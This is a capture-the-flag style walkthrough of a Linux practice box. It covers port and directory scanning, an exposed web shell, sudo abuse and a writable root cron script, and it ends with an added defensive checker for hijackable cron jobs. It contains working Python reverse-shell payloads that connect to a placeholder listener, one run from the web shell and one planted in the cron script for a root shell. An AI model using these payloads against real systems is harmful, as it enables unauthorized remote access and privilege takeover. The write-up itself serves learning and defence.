Info
- IP: 10.10.10.68
- OS: Linux
- Supposed to be Easy
Recon
~ nmap -T5 -vvv 10.10.10.68
Completed Connect Scan at 02:25, 30.51s elapsed (1000 total ports)
Nmap scan report for 10.10.10.68
Host is up, received syn-ack (0.25s latency).
Scanned at 2024-01-23 02:25:14 EST for 31s
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON
80/tcp open http syn-ack
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 43.83 seconds
Only 80/tcp is open, so the web application is the whole attack surface. Next, enumerate directories:
~ gobuster dir -u 10.10.10.68 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 500 2>/dev/null
===============================================================
[+] Url: http://10.10.10.68
[+] Method: GET
[+] Threads: 500
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/uploads (Status: 301) [Size: 312] [--> http://10.10.10.68/uploads/]
/images (Status: 301) [Size: 311] [--> http://10.10.10.68/images/]
/css (Status: 301) [Size: 308] [--> http://10.10.10.68/css/]
/dev (Status: 301) [Size: 308] [--> http://10.10.10.68/dev/]
/js (Status: 301) [Size: 307] [--> http://10.10.10.68/js/]
/fonts (Status: 301) [Size: 310] [--> http://10.10.10.68/fonts/]
===============================================================
Finished
===============================================================
That /dev looks fun. Let's go in there.

Inside /dev/ sits phpbash.php, a web-based shell: whatever you type into it runs on the server as the web server user, so we already have command execution. The next thing I check for is python, and with it I get myself a proper interactive reverse shell (/bin/sh -i gives an interactive prompt rather than a full tty, but that is enough for the rest of the box).
# on attacking machine
~ nc -lnvp 9000
# on phpbash.php
~ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("1.2.3.4",9000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
# (replace 1.2.3.4 and 9000 with your own listener's address and port)
Once we have a shell as www, type sudo -l to see what we are allowed to run through sudo:
~ sudo -l
[...]
(scriptmanager : scriptmanager) NOPASSWD: ALL
Any command as scriptmanager, no password needed, so just spawn a shell as that user:
~ sudo -u scriptmanager bash
scriptmanager@bashed:~$
Go ahead and scout around a bit using whatever tools you normally use.
Info
I dug around a bit on my first pass and already know that there is a directory owned by scriptmanager in the root of the filesystem.
It contains two files: a python script, and a text file owned by root whose contents change every minute or so. A file that root rewrites on a fixed schedule is a strong hint that a cron job is running.
Examining test.py confirms the suspicion: a root cron job runs test.py every minute and writes its output to test.txt. Since the directory is owned by scriptmanager, the user we now are, we can modify (or replace) the script and have root execute whatever we put there.
I used the same trick as for the initial shell: open another nc listener and wait for cron to run test.py.
Modify test.py to something similar to this:
import socket,subprocess,os
# connect back to the attacker's listener (replace 1.2.3.4 and 9001 with yours)
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("1.2.3.4",9001))
# wire stdin/stdout/stderr of the child shell to the socket
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
# cron runs this as root, so the shell comes back as root
p=subprocess.call(["/bin/sh","-i"])
Then open another netcat instance on port 9001 (or whatever port you like):
~ nc -lnvp 9001
Wait a minute or two for cron to fire, and there you have it: a root shell.
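The privilege escalation above rests on one precondition: a cron job executed as root references a file that a lower-privileged user can modify or replace. Rather than relying on noticing a text file's mtime ticking over, that precondition can be checked systematically. The following is an added example written for this writeup, not code from the original post or from the box; it parses system-crontab style entries (the ones that carry a user field, as in /etc/crontab and /etc/cron.d/*), pulls out absolute paths from each root job's command, and tests whether a given uid/gid set could write or replace each path, including the "missing file in a writable directory" case and sticky-bit directories. The crontab text and the temporary directory in the demo are constructed for the example and are not the box's real paths.

```python
import os
import stat
import tempfile


def parse_crontab(text):
    """Parse lines of the form '<5 schedule fields> <user> <command>' or
    '@reboot <user> <command>'. Comments, blanks and VAR=value lines are skipped."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if "=" in line.split(None, 1)[0]:      # PATH=... style assignment, not a job
            continue
        n = 1 if line.startswith("@") else 5   # '@reboot' is a one-token schedule
        fields = line.split(None, n + 1)
        if len(fields) < n + 2:
            continue
        entries.append((" ".join(fields[:n]), fields[n], fields[n + 1]))
    return entries


def absolute_paths(command):
    """Tokens that look like absolute paths: interpreter, script, redirect targets.
    Relative names (e.g. 'python test.py') are not resolved, since cron's working
    directory is not known from the entry alone."""
    return [tok for tok in command.split() if tok.startswith("/")]


def writable_by(path, uid, gids):
    """True if a user with this uid/gids (assumed non-root) can change the file,
    or replace/create it because the containing directory is writable.
    The owner counts as able to write even without the w bit: it can chmod."""
    gids = set(gids)

    def can_write(s):
        if s.st_uid == uid:
            return True
        if s.st_gid in gids and s.st_mode & stat.S_IWGRP:
            return True
        return bool(s.st_mode & stat.S_IWOTH)

    try:
        st = os.lstat(path)
    except OSError:
        st = None                               # missing file: plantable if dir is writable
    if st is not None and can_write(st):
        return True
    parent = os.path.dirname(os.path.abspath(path)) or "/"
    try:
        pst = os.lstat(parent)
    except OSError:
        return False
    if not can_write(pst):
        return False
    # sticky directory (/tmp style): only the file's or the directory's owner may replace it
    owners = {pst.st_uid} | ({st.st_uid} if st is not None else set())
    if pst.st_mode & stat.S_ISVTX and uid not in owners:
        return False
    return True


def hijackable_jobs(crontab_text, uid, gids, root_only=True):
    """(schedule, user, path) for every job whose command references a path the
    given user could modify or replace. root_only limits it to jobs run as root,
    which is the privilege-escalation case."""
    findings = []
    for schedule, user, command in parse_crontab(crontab_text):
        if root_only and user != "root":
            continue
        for p in absolute_paths(command):
            if writable_by(p, uid, gids):
                findings.append((schedule, user, p))
    return findings


def demo():
    """Constructed layout mimicking the box: a directory owned by the current user
    holding test.py, referenced by a root cron entry. Returns the findings for the
    current user and for an unrelated uid (12345, hypothetical) that owns nothing."""
    d = tempfile.mkdtemp()
    script = os.path.join(d, "test.py")
    with open(script, "w") as f:
        f.write("print('hello')\n")
    os.chmod(script, 0o644)
    os.chmod(d, 0o755)
    crontab = (
        "PATH=/usr/local/bin:/usr/bin:/bin\n"
        "# m h dom mon dow user command\n"
        "* * * * * root /usr/bin/python %s > %s/test.txt\n"
        "@reboot root /usr/bin/true\n"
    ) % (script, d)
    me = hijackable_jobs(crontab, os.getuid(), os.getgroups())
    other = hijackable_jobs(crontab, 12345, [12345])
    return crontab, me, other


if __name__ == "__main__":
    crontab, me, other = demo()
    for schedule, user, path in me:
        print("writable target for current user: %s (job '%s' as %s)" % (path, schedule, user))
    print("targets for an unrelated uid:", other)
```

Run as the user you are evaluating (scriptmanager here) so that os.getuid()/os.getgroups() reflect that user. The check only covers entries you can read; on many boxes /etc/crontab and /etc/cron.d are world-readable, but per-user crontabs under /var/spool/cron are not, and for those the mtime observation the writeup relied on remains the practical fallback.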